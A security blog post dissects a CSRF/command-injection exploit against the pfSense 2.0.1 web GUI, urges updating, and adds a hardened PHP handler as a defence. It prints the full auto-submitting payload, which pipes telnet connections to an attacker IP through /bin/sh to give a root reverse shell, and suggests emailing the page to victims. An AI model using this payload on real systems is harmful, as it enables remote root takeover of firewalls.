Analyzing the pfSense 2.0.1 XSS Remote Command Execution Exploit

If you have any pfSense systems running software version 2.0.1, I would advise updating them to 2.0.2 immediately. Version 2.0.1 contains a flaw in the web GUI (published as an XSS/CSRF exploit) that lets a remote attacker run commands as root on the targeted pfSense system.

The code for this exploit has now been released publicly making it even more important to apply the update.

I was curious to see how this exploit worked so I decided to test it out against one of the pfSense systems on my local network.

Exploit Details

This exploit allows an attacker to gain remote root access to the pfSense system through an XSS/CSRF vulnerability in the web GUI: a forged POST to system_firmware.php carries shell commands in the kerneltype field, and the GUI hands that value to a shell running as root. The attacker sets up two Netcat listeners on their system, one used for sending commands and the other for capturing the output.

To execute the exploit the attacker sends the victim a link to an HTML page. Once the victim opens the page it submits the forged form automatically, and a remote shell is spawned from the pfSense box back to the attacker's Netcat listeners.

I’ve tested the exploit and was able to successfully obtain a root shell against pfSense with either HTTP or HTTPS enabled on the web interface.

Limitations

While this is considered a high-risk vulnerability in pfSense, the attack has several conditions that must be met in order for it to work.

  1. The victim must already have admin access to the pfSense web gui.
  2. The victim must be logged into the web gui prior to clicking on the exploit link.
  3. The attacker must know the LAN IP of the victim's pfSense system.
  4. The victim's pfSense box must be able to connect to both of the Netcat listeners.

In reality these conditions are not very difficult to meet.  Many administrators stay logged into the pfSense web GUI, so the browser already holds a valid session cookie and sends it along with the forged request.

An attacker who already has access to the LAN on which the system resides will have no difficulty obtaining its LAN IP address.  A LAN attacker would also not need to worry about outbound firewall rules restricting the Netcat reverse shell connections.

The Exploit Code

The author of this exploit has made it very easy for anyone who wants to use the code against a target system.  Within the exploit code is a CSRF generator which can be used to craft the attack with a few clicks.

###################################################################
# Exploit Title: pfSense 2.0.1 XSS & CSRF Remote root Access
# Date: 04/01/2013
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.0.1
# Category: XSS & CSRF Remote root Access
# Google dork:
# Tested on: FreeBSD
######################################################################


Using the CSRF Generator

Using the HTML generator the attacker simply needs to fill out a few form fields and the exploit code is generated dynamically.  The page even provides the commands to set up the Netcat sender and receiver.

  1. Open two command prompts and run each of the Netcat commands listed, one in each shell.
  2. Enter the URL for the web interface of the target system.  For HTTPS use https://<IP-ADDRESS>:443/.
  3. Enter the LAN IP of the target system.
  4. Save the generated HTML code as a new file.

pfSense CSRF Generator

Looking at the Generated Code

Let’s take a look at the HTML code generated to see what it’s actually doing.

From the first line we can see the form uses the POST method against the system_firmware.php file.

action='http://192.168.1.1:80/system_firmware.php' method='post'

The form posts a hidden input called kerneltype.  Its value begins with SMP, the legitimate kernel type, but the rest of the string is shell syntax: the redirect to /boot/kernel/pfsense_kernel.txt completes whatever command the server builds around the value, and following the semicolon we can see the actual payload of the exploit itself.  The payload opens a telnet session to the attacker's machine on port 1337, pipes whatever it receives into /bin/sh, and pipes the shell's output into a second telnet session on port 1338.  Because the web GUI runs as root, so does the shell.  The script tag at the end submits the form as soon as the page loads, so the victim only has to open the page.

<input type='hidden' name='kerneltype' value='SMP > /boot/kernel/pfsense_kernel.txt;telnet 192.168.1.100 1337 | /bin/sh | telnet 192.168.1.100 1338' /></form><script>document.forms['x'].submit();
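To make the injection concrete, here is an added example, not pfSense's own code and not the exploit author's. The page does not show the server-side PHP, so the unsafe function is a hypothetical reconstruction of the pattern the payload implies (the kerneltype value is echoed into a kernel-type file through a shell). Next to it is a hardened handler that rejects forged cross-site POSTs with a per-session CSRF token, validates the value against an allowlist, and writes the file without a shell at all. The function names, the allowlist of kernel names, the session layout and the demo file path are assumptions for illustration.

```php
<?php
// Added example, not pfSense's own code and not the exploit author's.
// Hypothetical reconstruction of the unsafe pattern the payload implies:
// the kerneltype POST field is interpolated into a shell command line, so
// ';', '|' and '>' inside the value are parsed by the shell, not stored.
const KERNEL_TYPE_FILE = '/boot/kernel/pfsense_kernel.txt';  // path from the payload
const ALLOWED_KERNELS  = ['SMP', 'UP'];                       // assumed legitimate values

function build_kernel_command_unsafe(string $kerneltype): string
{
    // The vulnerable path hands this string to exec(); it is only returned
    // here so the example can show what the shell would have seen.
    return "echo {$kerneltype} > " . KERNEL_TYPE_FILE;
}

function csrf_token_for_session(array &$session): string
{
    // One unguessable token per session; a page on the attacker's site
    // cannot read it, so it cannot include it in the forged form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function set_kernel_type_safe(array $post, array $session, string $file = KERNEL_TYPE_FILE): string
{
    // 1. Reject forged cross-site POSTs: without the victim's token the
    //    constant-time comparison fails before anything else happens.
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !hash_equals($expected, $given)) {
        throw new RuntimeException('CSRF token missing or invalid');
    }

    // 2. Strict allowlist: anything other than a known kernel name is refused
    //    before it gets anywhere near a shell.
    $kerneltype = $post['kerneltype'] ?? '';
    if (!in_array($kerneltype, ALLOWED_KERNELS, true)) {
        throw new InvalidArgumentException('unknown kernel type');
    }

    // 3. No shell at all: write the file directly. If a shell were unavoidable,
    //    the value would still have to go through escapeshellarg().
    if (file_put_contents($file, $kerneltype . "\n") === false) {
        throw new RuntimeException('could not write ' . $file);
    }
    return $kerneltype;
}

// Demonstration with the value from the generated exploit page (constructed
// here from the page's payload; nothing is executed).
$payload = 'SMP > /boot/kernel/pfsense_kernel.txt;telnet 192.168.1.100 1337 | /bin/sh | telnet 192.168.1.100 1338';
echo "unsafe: ", build_kernel_command_unsafe($payload), "\n";
echo "quoted: ", escapeshellarg($payload), "\n";   // one single-quoted word to the shell

$session = [];
$token   = csrf_token_for_session($session);
$demo    = '/tmp/kernel_type_demo.txt';             // assumed writable demo path
try {
    set_kernel_type_safe(['kerneltype' => $payload], $session, $demo);
} catch (RuntimeException $e) {
    echo "blocked (no token): ", $e->getMessage(), "\n";
}
try {
    set_kernel_type_safe(['kerneltype' => $payload, 'csrf_token' => $token], $session, $demo);
} catch (InvalidArgumentException $e) {
    echo "blocked (not allowlisted): ", $e->getMessage(), "\n";
}
echo "accepted: ", set_kernel_type_safe(['kerneltype' => 'SMP', 'csrf_token' => $token], $session, $demo), "\n";
```

The two defenses are independent and both matter here: the CSRF token stops the forged POST from a logged-in administrator's browser, and the allowlist (or, failing that, escapeshellarg()) stops the command injection even if a request does arrive with a valid session. Fixing only the token check would leave an authenticated attacker with root; fixing only the injection would still let a forged request change the kernel type.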

Launching the Attack

To execute the exploit the attacker needs to find a way for the victim to load the HTML code that was generated in the previous step.  The attacker could choose to do this in a number of ways.  For example, email the code to the victim as an attachment, or host the code on a web server and email the victim a link to it.

Once the code is executed the target system will connect back to both Netcat sessions.

Netcat Sender

pfSense Remote Shell - Sender

Netcat Receiver

pfSense Remote Shell - Receiver

Video Demonstration

Check out the video below to see the exploit in action.

Sam Kear

Sam graduated from the University of Missouri - Kansas City with a bachelors degree in Information Technology. Currently he works as a network analyst for an algorithmic trading firm. Sam enjoys the challenge of troubleshooting complex problems and is constantly experimenting with new technologies.
